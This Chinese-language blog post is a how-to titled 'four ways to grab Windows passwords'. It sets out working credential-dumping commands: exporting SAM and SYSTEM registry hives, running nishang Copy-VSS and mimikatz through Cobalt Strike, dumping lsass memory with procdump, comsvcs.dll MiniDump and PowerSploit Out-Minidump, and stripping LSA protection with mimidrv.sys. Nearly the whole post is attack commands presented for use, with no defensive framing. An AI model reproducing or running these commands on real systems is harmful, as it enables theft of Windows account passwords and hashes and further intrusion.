首页 > 系统相关 >Windows密码抓取的四种方式

Windows密码抓取的四种方式

时间:2023-05-31 15:03:44浏览次数:33  
标签:exe sam Windows lsass 抓取 mimikatz powershell 四种

Windows密码抓取的四种方式

一、SAM离线抓取

1、通过reg命令无工具导出,然后下载到本地用mimikatz读取用户NTLM Hash

reg save hklm\sam sam.hive
reg save hklm\system system.hive

2、通过nishang中的Copy-VSS进行复制

(1)在CS中导入模块

powershell-import ./powershell/Copy-VSS.ps1

(2)执行复制sam、system文件命令

powershell Copy-VSS

(3)把文件下载到本地

(4)用mimikatz读取用户NTLM Hash

lsadump::sam /sam:sam.hive /system:system.hive

二、SAM在线抓取

(1)用CS把mimikatz上传到服务器

(2)读取用户NTLM Hash

shell mimikatz.exe "privilege::debug" "token::elevate" "lsadump::sam" exit

三、lsass离线抓取

1、使用任务管理器导出

2、使用procdump导出lsass.dmp文件

procdump.exe -accepteula -ma lsass.exe lsass.dmp

3、comsvcs.dll,系统自带。通过comsvcs.dll的导出函数MiniDump实现dump内存

(1)首先查看lsass.exe进程PID

shell tasklist | findstr lsass.exe

(2)使用powershell导出

powershell rundll32 C:\windows\system32\comsvcs.dll, MiniDump 644 C:\Users\Administrator\Desktop\lsass.dmp full

4、使用PowerSploit 的Out-MiniDump模块

(1)导入powershell脚本

powershell-import .\powershell\Out-Minidump.ps1

(2)命令

Get-Process lsass | Out-Minidump

使用mimikatz读取lsass.dmp文件

mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full"

四、lsass在线抓取

如果遇到LSA保护,可以尝试使用mimikatz提供的mimidrv.sys来绕过

privilege::debug
!+
!procoessprotect /process:lsass.exe /remove
sekurlsa::logonpasswords

(1)提升到debug权限

privilege::debug

(2)抓取密码

sekurlsa::logonPasswords 

标签:exe,sam,Windows,lsass,抓取,mimikatz,powershell,四种
From: https://www.cnblogs.com/candada/p/17446123.html

相关文章

  • RabbitMQ在Windows下设置服务启动
    1.管理员模式运行  cmd 2.进入RabbitMQ安装目录下的sbin目录   输入命令: cdrabbitMQ的sbin路径,进入sbin目录输入命令:rabbitmq-service.batinstall进入服务,开启rabbitMQ服务 ......
  • windows下安装多个Redis实例
     1.复制配置: redis.windows-service.conf为redis.windows-service-6380.conf2.更改配置: 如端口/密码等3.安装实例:cdC:\ProgramFiles\Redis&&redis-server.exe--service-installredis.windows-service-6380.conf--service-nameRedis6380--port63804.启动实......
  • windows访问k8s
    windows访问ekspods安装AWSCLI网址为https://awscli.amazonaws.com/AWSCLIV2.msi。查看aws版本。aws--version配置AWSCLI凭证eksctl和AWSCLI均要求您在环境中配置AWS凭证。awsconfigure命令是设置安装以供一般使用的最快方法。$awsconfigureAWSAccess......
  • C++四种强制类型详解
    向上转型(上行转换)派生类对象转换为基类对象(包括指针和对象),直接转换由编译器完成,是绝对安全的内存里面:基类对象相当于只是换了个地址,换成了派生类中存储基类成员的内存地址,但是派生类对象中有的,基类没有的变量仍然存在内存中(保留了再次从基类转换成派生类的可能性)向下转型(下行......
  • 支持在 Windows 环境下安装和使用。以下是在 Windows 环境下安装 CloneDeploy 的步骤
    CloneDeploy是一款基于Linux的开源系统部署解决方案,但也支持在Windows环境下安装和使用。以下是在Windows环境下安装CloneDeploy的步骤:准备环境:在安装CloneDeploy前,需要先在Windows操作系统中安装好Apache、PHP和MySQL服务。推荐使用XAMPP或WAMP等集成开......
  • 又来了两款高效且实用的Windows软件
    ■ FreeCountdownTimerFreeCountdownTimer是一款大小在4.5MB左右的,简单好用的免费的倒计时、倒数日软件。它目前仅支持Windows平台。我们可以用它快速的创建多个计时器和事件,并给不同的定时器和事件设置不同的提示音。所以平时我们可以将它作为一个闹钟、倒数计时器、节拍......
  • 局域网 Windows 系统克隆方案有很多,以下是一些较为常见的
    局域网Windows系统克隆方案有很多,以下是一些较为常见的:Windows原生工具:Windows系统自带了众所周知的“系统备份和恢复”工具。您可以使用这个工具创建一个系统备份,并在需要的时候将备份还原到其他计算机中。这种方法的缺点是需要手动完成,不够自动化和高效。SymantecGho......
  • 如何在Mac、Windows和Docker上本地电脑上搭建AI人工智能绘画工具Stable Diffusion
    微信公众号:运维开发故事,作者:double冬一、概述目前,有诸如Midjourney等人工智能绘画网站可供大家来免费使用,但是由于是免费资源肯定会在机器性能和使用次数方面有所限制,因此如果能将人工智能绘画工具部署在本地运行就会突破机器性能和使用次数等方面的限制。可能所有人类画师都得发......
  • windows驱动开发之网络双机调试(三)
    一、配置目标计算机首先在被调试机上也安装上WDK环境,随后在WDK的安装目录下运行该工具 WDKTestTargetSetup,默认路径:C:\ProgramFiles(x86)\WindowsKits\10\Remote\x64\WDKTestTargetSetupx64-x64_en-us.msi;在之后调试机中的 VisualStudio 将连接被调试机的 WDK......
  • go exec.Command windows 参数引号转义问题
    Go在windows上调用本地进程传参时的一个天坑Golanggo在windows上exec.Command调用本地进程在传参的时候有一个天坑,举个栗子来说正常来说一般代码会这么写cmdLine:="notepad.exe"+`"D:\ProgramFiles\Notepad++\session.xml"`cmd:=exec.Command("cmd.exe","/c",cmdL......